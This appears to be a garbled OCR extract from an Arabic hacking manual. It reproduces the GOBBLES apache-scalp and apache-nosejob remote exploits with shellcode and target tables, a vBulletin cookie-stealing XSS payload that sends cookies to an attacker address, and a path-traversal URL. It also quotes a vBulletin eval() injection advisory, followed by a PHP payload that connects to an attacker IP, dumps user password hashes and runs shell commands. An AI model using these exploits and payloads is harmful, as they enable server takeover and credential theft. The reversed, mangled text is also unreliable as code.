\x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x90\\\\ "\\\
\\xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x24 \\\
"\\\x04\\
\x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\xc7\\\\ "\\\
\\x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x00 \\\
"\\\xb8\\
\x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\xff \\\\ "\\\
\\x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x08 \\\
"\\\x03\\
\x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x0b \\\\ "\\\
\\x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x01 \\\
"\\\x89\\

284

\xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x6a\\\\ "\\\
\\x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\xcd \\\
"\\\x80\\
\x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x2f\\\\ "\\\
\\x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\xc0 \\\
"\\\x50\\
\x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x50\\\\ "\\\
\\xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\
;"\\\xcc\\
} struct
;char *type
;u_long retaddr
!targets[] = { // hehe, yes theo, that say OpenBSD here {
,{ OpenBSD 3.0 x86 / Apache 1.3.20\\\", 0xcf92f"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.22\\\", 0x8f0aa"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.24\\\", 0x90600"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.20\\\", 0x8f2a6"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.23\\\", 0x90600"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24\\\", 0x9011a"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", 0x932ae"\\\ }
;{
} ([]int main(int argc, char *argv
;char *hostp, *portp
;unsigned char buf[512], *expbuf, *p
;int i, j, lport
;int sock
;int bruteforce, owned, progress
;u_long retaddr
;struct sockaddr_in sin, from
} (if(argc != 3
;([printf(\\\"Usage: %s \\\\n\\\", argv[0
;("\\\printf(\\\" Using targets:\\\\t./apache-scalp 3 127.0.0.1:8080\\\\n
printf(\\\" Using bruteforce:\\\\t./apache-scalp 0x8f000
;("\\\127.0.0.1:8080\\\\n
;("\\\printf(\\\"\\\\n--- --- - Potential targets list - --- ----\\\\n
;("\\\printf(\\\"Target ID / Target specification\\\\n
(++for(i = 0; i < sizeof(targets)/8; i
;(printf(\\\"\\\\t%d / %s\\\\n\\\", i, targets[i].type
;return -1
{

285

;("\\\:"\\\ ,[hostp = strtok(argv[2

(if((portp = strtok(NULL, \\\":\\\")) == NULL
;"\\\portp = \\\"80
;(retaddr = strtoul(argv[1], NULL, 16
} (if(retaddr < sizeof(targets)/8
;retaddr = targets[retaddr].retaddr
;bruteforce = 0
{
else
;bruteforce = 1
;(()srand(getpid
;(signal(SIGPIPE, SIG_IGN
} (for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC
/* skip invalid return adresses */
;i = retaddr & 0xff
(if(i == 0x0a || i == 0x0d
;++retaddr
((else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4
;continue
;(sock = socket(AF_INET, SOCK_STREAM, 0
;sin.sin_family = AF_INET
;(sin.sin_addr.s_addr = inet_addr(hostp
;((sin.sin_port = htons(atoi(portp
(if(!progress
;("\\\ ..printf(\\\"\\\\n[*] Connecting
;(fflush(stdout
} (if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0
;("\\\()perror(\\\"connect
;(exit(1
{
(if(!progress
;("\\\printf(\\\"connected!\\\\n
/* Setup the local port in our shellcode */
;(i = sizeof(from
} (if(getsockname(sock, (struct sockaddr *) & from, &i) != 0
;("\\\()perror(\\\"getsockname
;(exit(1
{
;(lport = ntohs(from.sin_port

286

;shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff

;shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff
p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) *
(REP_SHELLCODE
PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) *)) +
;((REP_POPULATOR
;("\\\PUT_STRING(\\\"GET / HTTP/1.1\\\\r\\\\nHost: apache-scalp.c\\\\r\\\\n
} (++for (i = 0; i < REP_SHELLCODE; i
;("\\\-PUT_STRING(\\\"X
;(PUT_BYTES(PADSIZE_3, PADDING_3
;("\\\ :"\\\)PUT_STRING
;(PUT_BYTES(NOPCOUNT, NOP
;(memcpy(p, shellcode, sizeof(shellcode) - 1
;p += sizeof(shellcode) - 1
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
} (++for (i = 0; i < REP_POPULATOR; i
;("\\\-PUT_STRING(\\\"X
;(PUT_BYTES(PADSIZE_1, PADDING_1
;("\\\ :"\\\)PUT_STRING
} (++for (j = 0; j < REP_RET_ADDR; j
;p++ = retaddr & 0xff*
;p++ = (retaddr >> 8) & 0xff*
;p++ = (retaddr >> 16) & 0xff*
;p++ = (retaddr >> 24) & 0xff*
{
;(PUT_BYTES(REP_ZERO, 0
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
;("\\\PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n
;(snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2
;(PUT_STRING(buf
;(PUT_BYTES(PADSIZE_2, PADDING_2
snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\",
;(MEMCPY_s1_OWADDR_DELTA
;(PUT_STRING(buf
;(write(sock, expbuf, p - expbuf
;++progress
(if((progress%70) == 0
;progress = 1

287

} (if(progress == 1
;((memset(buf, 0, sizeof(buf
sprintf(buf, \\\"\\\\r[*] Currently using retaddr 0x%lx, length %u, localport
,"\\\%u
;(retaddr, (unsigned int)(p - expbuf), lport
;((memset(buf + strlen(buf), \\' \\', 74 - strlen(buf
;(puts(buf
(if(bruteforce
;('\\;'\\)putchar
{
else
;('\\putchar((rand()%2)? \\'P\\': \\'p
;(fflush(stdout
} (while (1
;fd_set fds
;int n
;struct timeval tv
;tv.tv_sec = EXPLOIT_TIMEOUT
;tv.tv_usec = 0
;(FD_ZERO(&fds
;(FD_SET(0, &fds
;(FD_SET(sock, &fds
;((memset(buf, 0, sizeof(buf
} (if(select(sock + 1, &fds, NULL, NULL, &tv) > 0
} ((if(FD_ISSET(sock, &fds
(if((n = read(sock, buf, sizeof(buf) - 1)) <= 0
;break
} (if(!owned && n >= 4 && memcmp(buf, \\\"\\\\nok\\\\n\\\", 4) == 0
;("\\\printf(\\\"\\\\nGOBBLE GOBBLE!@#%%)*#\\\\n
;(printf(\\\"retaddr 0x%lx did the trick!\\\\n\\\", retaddr
sprintf(expbuf, \\\"uname -a;id;echo hehe, now use 0day OpenBSD local
;("\\\kernel exploit to gain instant r00t\\\\n
;((write(sock, expbuf, strlen(expbuf
;++owned
{
;(write(1, buf, n
{
} ((if(FD_ISSET(0, &fds
(if((n = read(0, buf, sizeof(buf) - 1)) < 0
;(exit(1
;(write(sock, buf, n

288

{
{
(if(!owned
;break
{
;(free(expbuf
;(close(sock
(if(owned
;return 0
} (if(!bruteforce
;("\\\fprintf(stderr, \\\"Ooops.. hehehe!\\\\n
;return -1
{
{
;return 0
{
:Exploit #2
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
__ifdef __linux#
include#
endif#
/* define HOST_PARAM \\\"apache-nosejob.c\\\" /* The Host: field#
define DEFAULT_CMDZ \\\"uname -a;id;echo \\'hehe, now use another#
"\\\bug/backdoor/feature (hi Theo!) to gain instant r00t\\';\\\\n
define RET_ADDR_INC 512#
define PADSIZE_1 4#
define PADSIZE_2 5#
define PADSIZE_3 7#

289

define REP_POPULATOR 24#

define REP_SHELLCODE 24#
define NOPCOUNT 1024#
define NOP 0x41#
'\\define PADDING_1 \\'A#
'\\define PADDING_2 \\'B#
'\\define PADDING_3 \\'C#
;(define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s#
;define PUT_BYTES(n, b) memset(p, b, n); p += n#
= []char shellcode
\x68\\\\x47\\\\x47\\\\x47\\\\x47\\\\x89\\\\xe3\\\\ "\\\
\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xc6 \\\
"\\\x04\\\\x24\\
\x04\\\\x53\\\\x50\\\\x50\\\\x31\\\\xd2\\\\x31\\\\ "\\\
\\xc9\\\\xb1\\\\x80\\\\xc1\\\\xe1\\\\x18\\\\xd1 \\\
"\\\xea\\\\x31\\
\xc0\\\\xb0\\\\x85\\\\xcd\\\\x80\\\\x72\\\\x02\\\\ "\\\
\\x09\\\\xca\\\\xff\\\\x44\\\\x24\\\\x04\\\\x80 \\\
"\\\x7c\\\\x24\\
\x04\\\\x20\\\\x75\\\\xe9\\\\x31\\\\xc0\\\\x89\\\\ "\\\
\\x44\\\\x24\\\\x04\\\\xc6\\\\x44\\\\x24\\\\x04 \\\
"\\\x20\\\\x89\\
\x64\\\\x24\\\\x08\\\\x89\\\\x44\\\\x24\\\\x0c\\\\ "\\\
\\x89\\\\x44\\\\x24\\\\x10\\\\x89\\\\x44\\\\x24 \\\
"\\\x14\\\\x89\\
\x54\\\\x24\\\\x18\\\\x8b\\\\x54\\\\x24\\\\x18\\\\ "\\\
\\x89\\\\x14\\\\x24\\\\x31\\\\xc0\\\\xb0\\\\x5d \\\
"\\\xcd\\\\x80\\
\x31\\\\xc9\\\\xd1\\\\x2c\\\\x24\\\\x73\\\\x27\\\\ "\\\
\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xff \\\
"\\\x04\\\\x24\\
\x54\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\ "\\\
\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\x51 \\\
"\\\x50\\\\xb0\\
\x1d\\\\xcd\\\\x80\\\\x58\\\\x58\\\\x58\\\\x58\\\\ "\\\
\\x58\\\\x3c\\\\x4f\\\\x74\\\\x0b\\\\x58\\\\x58\\\
"\\\x41\\\\x80\\
\xf9\\\\x20\\\\x75\\\\xce\\\\xeb\\\\xbd\\\\x90\\\\ "\\\
\\x31\\\\xc0\\\\x50\\\\x51\\\\x50\\\\x31\\\\xc0 \\\
"\\\xb0\\\\x5a\\
\xcd\\\\x80\\\\xff\\\\x44\\\\x24\\\\x08\\\\x80\\\\ "\\\
\\x7c\\\\x24\\\\x08\\\\x03\\\\x75\\\\xef\\\\x31\\\
"\\\xc0\\\\x50\\
\xc6\\\\x04\\\\x24\\\\x0b\\\\x80\\\\x34\\\\x24\\\\ "\\\
\\x01\\\\x68\\\\x42\\\\x4c\\\\x45\\\\x2a\\\\x68 \\\
"\\\x2a\\\\x47\\
\x4f\\\\x42\\\\x89\\\\xe3\\\\xb0\\\\x09\\\\x50\\\\ "\\\

290

\\x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\x04 \\\
"\\\xcd\\\\x80\\
\x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x73\\\\ "\\\
\\x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x89 \\\
"\\\xe3\\\\x50\\
\x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x50\\\\ "\\\
;"\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc \\\
;
} struct
/* char *type; /* description for newbie penetrator
/* !int delta; /* delta thingie
/* u_long retaddr; /* return address
/* int repretaddr; /* we repeat retaddr thiz many times in the buffer
/* int repzero; /* and \\\\0\\'z this many times
!targets[] = { // hehe, yes theo, that say OpenBSD here {
,{ FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80f3a00, 6, 36"\\\ }
,{ FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80a7975, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.20\\\", -146, 0xcfa00, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.22\\\", -146, 0x8f0aa, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.24\\\", -146, 0x90600, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.24 #2\\\", -146, 0x98a00, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.20\\\", -146, 0x8f2a6, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.23\\\", -146, 0x90600, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24\\\", -146, 0x9011a, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", -146, 0x932ae, 6, 36"\\\ }
OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1\\\", -146, 0x1d7a00, 6,"\\\ }
,{ 36
,{ NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)\\\", -90, 0x80eda00, 5, 42"\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
;victim ,{

} (void usage(void
;int i
printf(\\\"GOBBLES Security Labs\\\\t\\\\t\\\\t\\\\t\\\\t- apache;("\\\nosejob.c\\\\n\\\\n
;("\\\printf(\\\"Usage: ./apache-nosejob <-switches> -h host[:80]\\\\n
;("\\\printf(\\\" -h host[:port]\\\\tHost to penetrate\\\\n
;("\\\printf(\\\" -t #\\\\t\\\\t\\\\tTarget id.\\\\n
;("\\\printf(\\\" Bruteforcing options (all required, unless -o is used!):\\\\n
;("\\\printf(\\\" -o char\\\\t\\\\tDefault values for the following OSes\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\t(f)reebsd, (o)penbsd, (n)etbsd\\\\n
;("\\\printf(\\\" -b 0x12345678\\\\t\\\\tBase address used for bruteforce\\\\n
printf(\\\" \\\\t\\\\t\\\\tTry 0x80000/obsd, 0x80a0000/fbsd,

291

;("\\\0x080e0000/nbsd.\\\\n
printf(\\\" -d -nnn\\\\t\\\\tmemcpy() delta between s1 and addr to
;("\\\overwrite\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\tTry -146/obsd, -150/fbsd, -90/nbsd.\\\\n
printf(\\\" -z #\\\\t\\\\t\\\\tNumbers of time to repeat \\\\\\\\0 in the
;("\\\buffer\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\tTry 36 for openbsd/freebsd and 42 for netbsd\\\\n
printf(\\\" -r #\\\\t\\\\t\\\\tNumber of times to repeat retadd in the
;("\\\buffer\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\tTry 6 for openbsd/freebsd and 5 for netbsd\\\\n
;("\\\printf(\\\" Optional stuff:\\\\n
printf(\\\" -w #\\\\t\\\\t\\\\tMaximum number of seconds to wait for
;("\\\shellcode reply\\\\n
printf(\\\" -c cmdz\\\\t\\\\tCommands to execute when our shellcode
;("\\\replies\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\taka auto0wncmdz\\\\n
printf(\\\"\\\\nExamples will be published in upcoming apache-scalp;("\\\HOWTO.pdf\\\\n
;("\\\printf(\\\"\\\\n--- --- - Potential targets list - --- ---- ------- ------------\\\\n
;("\\\printf(\\\" ID / Return addr / Target specification\\\\n
(++for(i = 0; i < sizeof(targets)/sizeof(victim); i
;(printf(\\\"% 3d / 0x%.8lx / %s\\\\n\\\", i, targets[i].retaddr, targets[i].type
;(exit(1
{
} ([]int main(int argc, char *argv
;char *hostp, *portp, *cmdz = DEFAULT_CMDZ
;u_char buf[512], *expbuf, *p
;int i, j, lport, sock
;int bruteforce, owned, progress, sc_timeout = 5
;int responses, shown_length = 0
;struct in_addr ia
;struct sockaddr_in sin, from
;struct hostent *he
(if(argc < 4
;()usage
;bruteforce = 0
;((memset(&victim, 0, sizeof(victim
} (while((i = getopt(argc, argv, \\\"t:b:d:h:w:c:r:z:o:\\\")) != -1
} (switch(i
/* required stuff */
:'\\case \\'h
;("\\\:"\\\ ,hostp = strtok(optarg
(if((portp = strtok(NULL, \\\":\\\")) == NULL
;"\\\portp = \\\"80

292

;break
/* predefined targets */
:'\\case \\'t
} ((if(atoi(optarg) >= sizeof(targets)/sizeof(victim
;("\\\printf(\\\"Invalid target\\\\n
;return -1
{
;((memcpy(&victim, &targets[atoi(optarg)], sizeof(victim
;break
/* !bruteforce */
:'\\case \\'b
;++bruteforce
;"\\\victim.type = \\\"Custom target
;(victim.retaddr = strtoul(optarg, NULL, 16
printf(\\\"Using 0x%lx as the baseadress while bruteforcing..\\\\n\\\",
;(victim.retaddr
;break
:'\\case \\'d
;(victim.delta = atoi(optarg
;(printf(\\\"Using %d as delta\\\\n\\\", victim.delta
;break
:'\\case \\'r
;(victim.repretaddr = atoi(optarg
printf(\\\"Repeating the return address %d times\\\\n\\\",
;(victim.repretaddr
;break
:'\\case \\'z
;(victim.repzero = atoi(optarg
;(printf(\\\"Number of zeroes will be %d\\\\n\\\", victim.repzero
;break
:'\\case \\'o
;++bruteforce
} (switch(*optarg
:'\\case \\'f
;"\\\victim.type = \\\"FreeBSD
;victim.retaddr = 0x80a0000
;victim.delta = -150
;victim.repretaddr = 6
;victim.repzero = 36
;break
:'\\case \\'o
;"\\\victim.type = \\\"OpenBSD

293

;victim.retaddr = 0x80000
;victim.delta = -146
;victim.repretaddr = 6
;victim.repzero = 36
;break
:'\\case \\'n
;"\\\victim.type = \\\"NetBSD
;victim.retaddr = 0x080e0000
;victim.delta = -90
;victim.repretaddr = 5
;victim.repzero = 42
;break
:default
;("\\\printf(\\\"[-] Better luck next time!\\\\n
;break
{
;break
/* optional stuff */
:'\\case \\'w
;(sc_timeout = atoi(optarg
printf(\\\"Waiting maximum %d seconds for replies from
;(shellcode\\\\n\\\", sc_timeout
;break
:'\\case \\'c
;cmdz = optarg
;break
:default
;()usage
;break
{
{
} (if(!victim.delta || !victim.retaddr || !victim.repretaddr || !victim.repzero
printf(\\\"[-] Incomplete target. At least 1 argument is missing (nmap
;("\\\style!!)\\\\n
;return -1
{
;("\\\ ..printf(\\\"[*] Resolving target host
;(fflush(stdout
;(he = gethostbyname(hostp
(if(he
;(memcpy(&ia.s_addr, he->h_addr, 4
} (else if((ia.s_addr = inet_addr(hostp)) == INADDR_ANY
;(printf(\\\"There\\'z no %s on this side of the Net!\\\\n\\\", hostp

294

;return -1
{
;((printf(\\\"%s\\\\n\\\", inet_ntoa(ia
;(()srand(getpid
;(signal(SIGPIPE, SIG_IGN
} (for(owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC
/* skip invalid return adresses */
((if(memchr(&victim.retaddr, 0x0a, 4) || memchr(&victim.retaddr, 0x0d, 4
;continue
;(sock = socket(PF_INET, SOCK_STREAM, 0
;sin.sin_family = PF_INET
;sin.sin_addr.s_addr = ia.s_addr
;((sin.sin_port = htons(atoi(portp
(if(!progress
;("\\\ ..printf(\\\"[*] Connecting
;(fflush(stdout
} (if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0
;("\\\()perror(\\\"connect
;(exit(1
{
(if(!progress
;("\\\printf(\\\"connected!\\\\n
p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) *
(REP_SHELLCODE
PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero)) +
;((REP_POPULATOR * (1024 +
PUT_STRING(\\\"GET / HTTP/1.1\\\\r\\\\nHost: \\\"
;("\\\HOST_PARAM \\\"\\\\r\\\\n
} (++for (i = 0; i < REP_SHELLCODE; i
;("\\\-PUT_STRING(\\\"X
;(PUT_BYTES(PADSIZE_3, PADDING_3
;("\\\ :"\\\)PUT_STRING
;(PUT_BYTES(NOPCOUNT, NOP
;(memcpy(p, shellcode, sizeof(shellcode) - 1
;p += sizeof(shellcode) - 1
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
} (++for (i = 0; i < REP_POPULATOR; i

295

;("\\\-PUT_STRING(\\\"X
;(PUT_BYTES(PADSIZE_1, PADDING_1
;("\\\ :"\\\)PUT_STRING
} (++for (j = 0; j < victim.repretaddr; j
;p++ = victim.retaddr & 0xff*
;p++ = (victim.retaddr >> 8) & 0xff*
;p++ = (victim.retaddr >> 16) & 0xff*
;p++ = (victim.retaddr >> 24) & 0xff*
{
;(PUT_BYTES(victim.repzero, 0
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
;("\\\PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n
;(snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2
;(PUT_STRING(buf
;(PUT_BYTES(PADSIZE_2, PADDING_2
;(snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", victim.delta
;(PUT_STRING(buf
} (if(!shown_length
;((printf(\\\"[*] Exploit output is %u bytes\\\\n\\\", (unsigned int)(p - expbuf
;shown_length = 1
{
;(write(sock, expbuf, p - expbuf
;++progress
(if((progress%70) == 0
;progress = 1
} (if(progress == 1
;(printf(\\\"\\\\r[*] Currently using retaddr 0x%lx\\\", victim.retaddr
(++ for(i = 0; i < 40; i
;("\\\ "\\\)printf
;("\\\printf(\\\"\\\\n
(if(bruteforce
;('\\;'\\)putchar
{
else
;('\\putchar(((rand()>>8)%2)? \\'P\\': \\'p
;(fflush(stdout
;responses = 0
} (while (1
;fd_set fds
;int n
;struct timeval tv

296

;tv.tv_sec = sc_timeout
;tv.tv_usec = 0
;(FD_ZERO(&fds
;(FD_SET(0, &fds
;(FD_SET(sock, &fds
;((memset(buf, 0, sizeof(buf
} (if(select(sock + 1, &fds, NULL, NULL, owned? NULL : &tv) > 0
} ((if(FD_ISSET(sock, &fds
(if((n = read(sock, buf, sizeof(buf) - 1)) < 0
;break
(if(n >= 1
}
(if(!owned
}
(++ for(i = 0; i < n; i
('\\if(buf[i] == \\'G
;++ responses
else
;responses = 0
(if(responses >= 2
}
;owned = 1
;(write(sock, \\\"O\\\", 1
;((write(sock, cmdz, strlen(cmdz
printf(\\\" it\\'s a TURKEY: type=%s, delta=%d, retaddr=0x%lx,
repretaddr=%d, repzero=%d\\\\n\\\", victim.type, victim.delta,
;(victim.retaddr, victim.repretaddr, victim.repzero
printf(\\\"Experts say this isn\\'t exploitable, so nothing will happen
;("\\\ :now
;(fflush(stdout
{
else {
;(write(1, buf, n
{
{
} ((if(FD_ISSET(0, &fds
(if((n = read(0, buf, sizeof(buf) - 1)) < 0
;(exit(1
;(write(sock, buf, n
{
{
(if(!owned

297

;break
{
;(free(expbuf
;(close(sock
(if(owned
;return 0
} (if(!bruteforce
;("\\\fprintf(stderr, \\\"Ooops.. hehehe!\\\\n
;return -1
{
{
;return 0
{

(( angels-bytes.com ))

http://www.angels-bytes.com/?show=tools&action=info&id=19

298

" "
><
php
) ( vb /
-1
.
-2 index.php admin
/
>?php
;"LOGIN = "User$
;"PASSWORD = "Password$
} (function error ($error_message
".echo $error_message
";
;exit
{
( && )if ( (!isset($PHP_AUTH_USER)) || ! (($PHP_AUTH_USER == $LOGIN
} ( (( "$PHP_AUTH_PW == "$PASSWORD
;(""header("WWW-Authenticate: Basic entrer="Form2txt admin
;("header("HTTP/1.0 401 Unauthorized
<error("<p align=right><font face=Tahoma size=2 color=Red
>;("<font></p/
{
?<

User

Password
299

-3 3000
!!
.
-4 HTML ..
.
-5 . .

" " vBulletin2,2,0

><
-------- :
-------- : vBulletin
) WebServer : ( + )( .
:
: vBulletin !! .
--------- :
-------- ..

.. .. HTML
) .. ( HTML
:
>script>document.write('<img
<src="http://my_ip_address/'+document.cookie+'">';</script
IP Adress IP .


..

) IIS Apache
( .

300

 Log ..
.. Apche logs . Acces Log
..
.. :
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54
%20bblastvi;1012444064=[20
sit=1011983161
..
..
..
?http://www.victim.com/vb/index.php
[bbuserid=[userid]&bbpassword=[password hash
" : ) " (....
) ( ..
.. )(

.. .. Forgot Password
..
!! ! ..
-----------
---------- HTML ) + + +
( ... +
) HTML (
.. IMG > <script ><img
> <Demon
... .
. Be Secret .. Dont' be Lamer
2002 - 1 - 31 :
2.2.0 .

301

" "
> <
> : <
7
1
2
3 SQL
4
5
6 %80
7

%100

****************
1
Powered by: vBulletin
1
2
3 %60

?http://www.vbulletin.org/index.php
<topic=<script>alert(document.cookie)</script

302

2
http://www.vbulletin.org/index.php?|
=forum/view.php&topic=../../../../../../../etc/passwd

********************


113


Jouko Pynnonen ( )
vBulletin (http://www.vbulletin.com/) is a commonly used web forum
,system written in PHP. One of its key features is use of templates
which allow the board administrator to dynamically modify the look of
.the board
vBulletin templates are parsed with the eval() function. This could be
somewhat safe as long as the parameters to eval() are under strict
control. Unfortunately this is where vBulletin fails. With an URL
crafted in a certain way, a remote user may control the eval() parameters
.and inject arbitrary PHP code to be executed
A remote user may thus execute any PHP code and programs as the
web
server user, typically "nobody", start an interactive shell and try to
elevate their privilege. The configuration files are accessible for the
web server so the user can in any case access the MySQL database
.containing the forums and user information
According to the authors the vulnerability exist in all versions of
vBulletin up to 1.1.5 and 2.0 beta 2. The bug does not involve buffer
overrun or other platform-dependant issues, so it's presumably
.exploitable under any OS or platform
DETAILS
=======
vBulletin templates are implemented in the following way: the
gettemplate() function in global.php is used to fetch a template from
database. The code is then passed to eval(). If we take index.php for
:an example, there's this code

303

} ("if ($action=="faq
;(";("\".("eval("echo dovars(\"".gettemplate("faq
{
The dovars() function does some variable replacing, such as replace
.<"largefont> with <font size="10>
:The gettemplate() function is defined in global.php
} (function gettemplate($templatename,$escape=1
gets a template from the db or from the local cache //
;global $templatecache,$DB_site
} (""=![if ($templatecache[$templatename
;[template=$templatecache[$templatename$
} else {
gettemp=$DB_site->query_first("SELECT template FROM template$
;("'".(WHERE title='". addslashes($templatename
;[template=$gettemp[template$
;templatecache[$templatename]=$template$
{
} (if ($escape==1
;(template=str_replace("\"","\\\"",$template$
{
;return $template
{

For effectiveness the function implements a simple cache for template

strings. After fetching them from the database they're stored in the
templatecache[] array. This array is checked for the template before
doing the SQL query. Unfortunately the array is never initialized, so
.a user can pass array contents in the URL, e.g
(for simplicity not %-escaped)
http://www.site.url/index.php?
action=faq&templatecache[faq]=hello+world
With this URL, you won't get the FAQ page, but just a blank page
."with the words "hello world
The eval() call above will execute
;("echo dovars("hello world

304

As if this wouldn't be bad enough, a remote user may as well pass a

value containing quotation marks and other symbols. Quotation marks
aren't always escaped as seen in the code above, in which case
index.php could end up executing code like
;("echo dovars("hello"world
This would produce a PHP error message due to unbalanced quotes. It
doesn't take a rocket scientist to figure out how a remote user could
execute arbitrary code from here, so further details about exploitation
aren't necessary. If your vBulletin board produces an error message
,with an URL like the one above prefixed with a single quotation mark
.it's definitely vulnerable
The above example works with the "Lite" version. The commercial
versions
are vulnerable too, but details may differ. After a little experimenting
on the Jelsoft's test site I found some of the commercial versions also
.have an eval() problem with URL redirecting, e.g
http://www.site.url/member.php?acti...ypass&url=hello"world
:and a similar one in the Lite version
http://www.site.url/search.php?
acti...s&templatecache[standardredirect]=hello"world

url
: hello+world
vb 113 or 115 -1
( ) 90 -2
url -3
search.php3?
action=simplesearch&query=searchthis&templatecache[standardredirec
t]="%29%3B%24fa="<%261";set_time_limit(substr("900",0,3));
%24fp=fsockopen(substr("IP.IP.IP.IP",0,12),substr("90",0,2),
%26%24errno,%26%24errstr,substr("900" ,0,3));if(!%24fp)
{}else{%24arr[200];fputs(%24fp,su
bstr("vhak1.0,%20- d%20downloads%20database,or%20press%20return
%20for
%20command%20line" ,0,63));%24va=fgets(%24fp,3);fputs(%24fp,
%24va);if

305

))strlen(%24va)>1
{include(substr("admin/config.php",0,16));include(substr("admin/config.
php3",0,17));mysql_connect(substr("%24servername",0,strlen(%24serve
rname)),substr("%24dbusername",0,strlen(%24dbusername)),substr("%
24dbpassword" ,0,strlen(%24dbpassword)));%24currenta=mysql_db_qu
*ery(substr("%24dbname",0,strlen(%24dbname)),substr("select%20
%20from%20user" ,0,18));while(%24res=mysql_fetch_array
%20(%24curre
))nta
{fputs(%24fp,"%24res[userid],");fputs(%24fp,"%24res[usergroupid],");fp
uts(%24fp,"%24res[password],");fputs(%24fp,"%24res
%24arr);%24str=exec(fgets(%24fp,substr("128",0,3)),
)%24arr);for(%24ir=substr("0",0,1);%24ir< sizeof(%24arr);%24ir%2B%2B
{fputs(%24fp,%24arr[%24
_ir]);fputs(%24fp,%24va);}}fclose(%24fp);}die(vhak
"finished_execution);echo%28
By Kill -9
IP.IP.IP.IP 12
127.0.0.1 9

) arabteam2000.com ( c4arab.com
...

!!

: 90
d downloads 2.2x

113 11

115 225
) WebServer : ( + )( .

306

 :
